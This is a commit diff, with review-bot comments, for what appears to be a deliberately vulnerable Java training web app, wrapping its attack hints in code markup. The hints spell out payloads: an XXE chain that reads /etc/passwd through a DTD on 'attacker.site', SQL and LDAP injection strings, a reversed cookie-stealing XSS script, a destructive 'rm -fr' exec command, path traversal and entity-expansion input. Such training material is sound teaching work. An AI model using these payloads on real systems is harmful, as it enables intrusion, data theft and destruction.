Improve overall design
k-tamura committed Apr 5, 2017
1 parent 32ad3a1 commit 8143a3b
Showing 8 changed files with 44 additions and 35 deletions.
Expand Up @@ -38,6 +38,7 @@ public static void createSimpleResponse(HttpServletResponse res, String htmlTitl
writer.write("<link rel=\"stylesheet\" href=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css\" integrity=\"sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u\" crossorigin=\"anonymous\">");
writer.write("<link rel=\"stylesheet\" href=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap-theme.min.css\" integrity=\"sha384-rHyoN1iRsVXV4nD0JutlnGaslCJuC7uwjduW9SVrLvRYooPp2bWYgmgJQIXwl/Sp\" crossorigin=\"anonymous\">");
writer.write("<script src=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js\" integrity=\"sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa\" crossorigin=\"anonymous\"></script>");
writer.write("<script type=\"text/javascript\" src=\"https://google-code-prettify.googlecode.com/svn/loader/run_prettify.js\"></script>");
writer.write("</HEAD>");
writer.write("<BODY STYLE=\"margin:20px;\">" + htmlBody + "</BODY>");
writer.write("</HTML>");
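Review bot: The new run_prettify.js `<script>` tag is the only third-party resource in this response without an `integrity` attribute, while the three bootstrap tags directly above it pin their content with SRI hashes and `crossorigin="anonymous"`; as written, whoever controls that host can execute script in every page produced by createSimpleResponse. Either add `integrity="sha384-<HASH_OF_PINNED_FILE>" crossorigin="anonymous"` (placeholder — compute from the exact file served) or, better, vendor the script into the webapp, since the path suggests it is a loader that fetches further files at runtime and an SRI hash on this tag alone would presumably not cover those. The googlecode.com SVN host is also unlikely to be a stable origin at this point, which is one more reason to serve the file locally. createSimpleResponse begins before and ends after this hunk.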
Expand Up @@ -55,14 +55,16 @@ protected void doGet(HttpServletRequest req, HttpServletResponse res) throws Ser
}
bodyHtml.append(MessageUtils.getMsg("msg.add.users.by.xml", locale));
bodyHtml.append("<br><br>");
bodyHtml.append("<pre id=\"code\" class=\"prettyprint lang-xml\">");
bodyHtml.append(ESAPI.encoder().encodeForHTML("<?xml version=\"1.0\"?>") + "<br>");
bodyHtml.append(ESAPI.encoder().encodeForHTML("<users ou=\"ou=people,dc=t246osslab,dc=org\" >") + "<br>");
bodyHtml.append(TAB + ESAPI.encoder()
.encodeForHTML("<user uid=\"user01\" phone=\"090-1234-5678\" mail=\"[email protected]\"/>") + "<br>");
bodyHtml.append(TAB + ESAPI.encoder()
.encodeForHTML("<user uid=\"user02\" phone=\"090-9876-5432\" mail=\"[email protected]\">") + "<br>");
bodyHtml.append(ESAPI.encoder().encodeForHTML("</users>"));
bodyHtml.append("<br><br>");
bodyHtml.append("</pre>");
bodyHtml.append("<br>");
bodyHtml.append("<input type=\"file\" name=\"file\" size=\"60\" /><br>");
bodyHtml.append(MessageUtils.getMsg("msg.select.upload.file", locale));
bodyHtml.append("<br><br>");
Expand All @@ -75,6 +77,7 @@ protected void doGet(HttpServletRequest req, HttpServletResponse res) throws Ser
if ("/xee".equals(req.getServletPath())) {
bodyHtml.append(MessageUtils.getMsg("msg.note.xee", locale));
bodyHtml.append("<br><br>");
bodyHtml.append("<pre id=\"code\" class=\"prettyprint lang-xml\">");
bodyHtml.append(ESAPI.encoder().encodeForHTML("<?xml version=\"1.0\" encoding=\"UTF-8\" ?>") + "<br>");
bodyHtml.append(ESAPI.encoder().encodeForHTML("<!DOCTYPE s[") + "<br>");
bodyHtml.append(ESAPI.encoder().encodeForHTML("<!ENTITY x0 \"ha!\">") + "<br>");
Expand All @@ -95,21 +98,26 @@ protected void doGet(HttpServletRequest req, HttpServletResponse res) throws Ser
bodyHtml.append(TAB + TAB + ESAPI.encoder().encodeForHTML("</ns1:reverse>") + "<br>");
bodyHtml.append(TAB + ESAPI.encoder().encodeForHTML("</soapenv:Body>") + "<br>");
bodyHtml.append(ESAPI.encoder().encodeForHTML("</soapenv:Envelope>") + "<br>");
bodyHtml.append("</pre>");
} else {
bodyHtml.append(MessageUtils.getMsg("msg.note.xxe.step1", locale));
bodyHtml.append("<br><br>");
bodyHtml.append("<pre id=\"code\" class=\"prettyprint lang-xml\">");
bodyHtml.append(ESAPI.encoder().encodeForHTML("<!ENTITY % p1 SYSTEM \"file:///etc/passwd\">") + "<br>");
bodyHtml.append(
ESAPI.encoder().encodeForHTML("<!ENTITY % p2 \"<!ATTLIST users ou CDATA '%p1;'>\">") + "<br>");
bodyHtml.append(ESAPI.encoder().encodeForHTML("%p2;"));
bodyHtml.append("<br><br>");
bodyHtml.append("</pre>");
bodyHtml.append("<br>");
bodyHtml.append(MessageUtils.getMsg("msg.note.xxe.step2", locale));
bodyHtml.append("<br><br>");
bodyHtml.append("<pre id=\"code\" class=\"prettyprint lang-xml\">");
bodyHtml.append(ESAPI.encoder().encodeForHTML("<?xml version=\"1.0\"?>") + "<br>");
bodyHtml.append(
ESAPI.encoder().encodeForHTML("<!DOCTYPE users SYSTEM \"http://attacker.site/vulnerable.dtd\" >")
+ "<br>");
bodyHtml.append(ESAPI.encoder().encodeForHTML("<users />"));
bodyHtml.append("</pre>");
}
bodyHtml.append("</form>");
HTTPResponseCreator.createSimpleResponse(res, MessageUtils.getMsg("title.xxe", locale), bodyHtml.toString());
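Review bot: The added `<pre id="code" class="prettyprint lang-xml">` lines reuse the same `id` within one response: the block appended before the `/xee` check (first hunk) plus either the one in the `/xee` branch or the two in the `else` branch, so the rendered document carries duplicate ids, which is invalid HTML and makes any `getElementById("code")` lookup ambiguous. If nothing references the id, drop it and keep the classes, `bodyHtml.append("<pre class=\"prettyprint lang-xml\">");`, at each of the four sites; if something does, give each block a distinct id. doGet starts before the first hunk of this file and continues past the last one.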
30 changes: 15 additions & 15 deletions src/main/resources/messages_en.properties
Expand Up @@ -5,7 +5,7 @@ description.endless.waiting=If you enter a character count, then a batch, includ
description.parse.json=If you enter a JSON string, then a result checked by JSON.parse() of JavaScript is shown.
description.random.string.generator=If you enter a character count, then a random characters of the count is created.
description.reverse.name=If you enter your name, then the reversed name is shown.
description.test.regular.expression=Please test if an input string matches the regular expression ^([a-z0-9]+[-]{0,1}){1,100}$.
description.test.regular.expression=Please test if an input string matches the regular expression <code>^([a-z0-9]+[-]{0,1}){1,100}$</code>.
description.send.mail=You can send a mail to the site administrator.
label.available.characters=Available Characters
label.asc=asc
Expand Down Expand Up @@ -55,7 +55,7 @@ msg.deadlock.occurs=A lock could not be obtained due to a deadlock.
msg.download.file=You can download the following PDF files.
msg.enter.json.string=Please enter JSON string.
msg.enter.mail=Please enter your mail address.
msg.enter.math.expression=Please enter a mathematical expression using java.lang.Math. For example, Math.sqrt(Math.pow(2, 6)) - 5
msg.enter.math.expression=Please enter a mathematical expression using java.lang.Math. For example, <code>Math.sqrt(Math.pow(2, 6)) - 5</code>
msg.enter.name.and.passwd=If you enter your name and password, then your secret number is shown.
msg.enter.name=Please enter your name.
msg.enter.passwd=If you enter a new password and click the submit button, then your password will be changed.
Expand All @@ -78,13 +78,13 @@ The number of login attempts is not limited on this page, so the brute force att
msg.note.clickjacking=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
This page receives a request that a user does not intend and changes the user's mail address.
msg.note.code.injection=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection.
If you enter <code>{}');java.lang.System.exit(0);//</code> , then JavaVM is forcibly finished due to code injection.
msg.note.csrf=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
This page receives a request that a user does not intend and changes the user's password.
msg.note.dangerous.file.inclusion=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
Change the query string to "template=[URL where malicious JSP file is deployed]", then a malicious code is executed.
Change the query string to <code>template=[URL where malicious JSP file is deployed]</code>, then a malicious code is executed.
msg.note.directory.traversal=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
Change the query string to "?template=../WEB-INF/web.xml?", then you can see the content of web.xml in the source code of this page.
Change the query string to <code>template=../WEB-INF/web.xml?</code>, then you can see the content of web.xml in the source code of this page.
msg.note.enter.count=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
If you enter a large character count, then an endless waiting process occurs.
msg.note.enter.one=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
Expand All @@ -94,33 +94,33 @@ Truncation error occurs if you enter 3 or 7 or 9.
msg.note.enter.decimal.value=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
Loss of trailing digits occurs if you enter 0.0000000000000001.
msg.note.enter.runtime.exec=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
If you enter @java.lang.Runtime@getRuntime().exec('rm -fr /your-important-dir/'), then your important directory is removed on your server.
If you enter <code>@java.lang.Runtime@getRuntime().exec('rm -fr /your-important-dir/')</code> , then your important directory is removed on your server.
msg.note.not.use.ext.db=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS.
msg.note.positive.number=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
Integer overflow occurs if you enter a number greater than or equal to 63.
msg.note.slow.regular.expression=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
If you set string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds<br> \
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;If you set string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then ...
If you set string to <code>aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042</code>, parse processing will take several tens of seconds<br> \
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;If you set string to <code>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042</code>, then ...
msg.note.slow.string.plus.operation=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
If you set a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator.
msg.note.sql.deadlock=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
If you open two windows (or tabs) and select "asc" and click the "update" button on one windows immediately after you select "desc" \
and click the "update" button on the other, then dead lock occurs in database.
msg.note.sql.injection=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
You can see other users information if you set password to "' OR '1'='1"
You can see other users information if you set password to <code>' OR '1'='1</code>
msg.note.ldap.injection=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
You can see other users information if you set name to "*)(|(objectClass=*" and password to "aaaaaaa)"
You can see other users information if you set name to <code>*)(|(objectClass=*" and password to "aaaaaaa)</code>
msg.note.mail.header.injection=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
If you change the subject field to textarea tag by browser's developer mode and set it to [subject][line break]Bcc: [a mail address], then you can send a mail to the address.
If you change the subject field to textarea tag by browser's developer mode and set it to <code>[subject][line break]Bcc: [a mail address]</code>, then you can send a mail to the address.
msg.note.mojibake=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
Mojibake occurs if you set name in a multibyte language
msg.note.null.byte.injection=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
If using Java earlier than version 1.7.0_40 and you add ?fileName=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml.
If using Java earlier than version 1.7.0_40 and you add <code>fileName=../WEB-INF/web.xml%00</code> to the query string, you can download a file which includes the content of web.xml.
msg.note.open.redirect=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
If you add goto=[an URL of a malicious site] to the query string, you can redirect to the malicious site.
If you add <code>goto=[an URL of a malicious site]</code> to the query string, you can redirect to the malicious site.
msg.note.unrestricted.ext.upload=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http://localhost:8080/uploadFiles/exit.jsp, \
If you upload JSP file (named exit.jsp) including <code><% System.exit(0); %></code> and access to http://localhost:8080/uploadFiles/exit.jsp, \
then JavaVM is forcibly finished.
msg.note.unintended.file.disclosure=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
If the directory listing feature works and you access to http://localhost:8080/uid/, then you can see the file list in the uid directory. \
Expand All @@ -132,7 +132,7 @@ It is easy to guess an account who can logs in since authentication error messag
msg.note.xee=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
If you upload the following file, it will waste server resource.
msg.note.xss=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
Session ID is shown if you set name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs<
Session ID is shown if you set name to <code>>tpircs/<;)eikooc.tnemucod(trela>tpIrcs<</code>
msg.note.xxe.step1=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
If you create the following DTD file on a web server that can be accessed by this server. For example, http://attacker.site/vulnerable.dtd
msg.note.xxe.step2=and upload the following file, you can display password file (/etc/passwd) on the server.
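Review bot: In the rewritten `msg.note.ldap.injection` entry (hunk starting at -94,33) a single `<code>` element wraps the name value, the words "and password to" and the password value together, and two `"` characters left over from the previous quoting remain inside it, so the rendered text reads as one garbled value. It should be two elements: `You can see other users information if you set name to <code>*)(|(objectClass=*</code> and password to <code>aaaaaaa)</code>`. A smaller wording point: `msg.note.code.injection` and `msg.note.enter.runtime.exec` keep a space between `</code>` and the following comma, while the other rewritten entries do not; `</code>, then` would match them.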